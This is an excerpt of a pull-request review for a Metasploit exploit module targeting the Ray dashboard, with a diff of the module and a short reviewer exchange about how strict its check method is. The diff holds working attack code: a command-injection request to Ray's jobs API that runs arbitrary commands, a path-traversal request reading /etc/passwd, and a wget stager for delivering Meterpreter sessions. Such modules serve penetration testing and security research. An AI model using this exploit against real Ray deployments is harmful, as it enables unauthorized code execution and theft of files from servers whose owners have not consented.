modules/exploits/linux/http/ray_cmdi_rce_lfi.rb

```diff
@@ -0,0 +1,175 @@
+          # RCE
+          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],
+          ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'],
+          ['CVE', '2023-6020'],
+          ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
+          ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
+        ],
+        'CmdStagerFlavor' => %i[wget],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+        ],
+        'DefaultOptions' => { 'MeterpreterTryToFork' => true },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+        OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]),
+        OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]),
+        OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
+      ]
+    )
+  end
+
+  def get_nodes
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')
+    })
+    return unless res && res.code == 200
+
+    JSON.parse(res.body)
+  end
+
+  def get_job_data(cmd)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/jobs/'),
+      'data' => { 'entrypoint' => cmd }.to_json
+    })
+    unless res && res.code == 200
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),
+        'data' => { 'entrypoint' => cmd }.to_json
+      })
+    end
+    return unless res && res.code == 200
+
+    JSON.parse(res.body)
+  end
+
+  def lfi
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}")
+    })
+    return unless res && res.code == 200
+
+    res.body
+  end
+
+  def check
+    case datastore['CVE']
+    when 'CVE-2023-6019'
+      @nodes = get_nodes
+      return Exploit::CheckCode::Safe if @nodes.nil?
+    when 'RCE'
+      @job_data = get_job_data(datastore['COMMAND'])
+      return Exploit::CheckCode::Safe if @job_data.nil?
+    when 'CVE-2023-6020'
+      @file_content = lfi
+      return Exploit::CheckCode::Safe if @file_content.nil?
+    end
+    Exploit::CheckCode::Appears
```

Comment:
I don't think this check is strict enough for `Appears` _maybe_ `Detected` but ideally if we can get a version number or something that'd be fantastic, just getting a response with data doesn't guarantee we're targeting the correct or a vulnerable service

https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

Reply:
Thank you! See. https://github.com/rapid7/metasploit-framework/pull/19363/commits/92e2694ac5733ac79542d023ad17093a0728e47e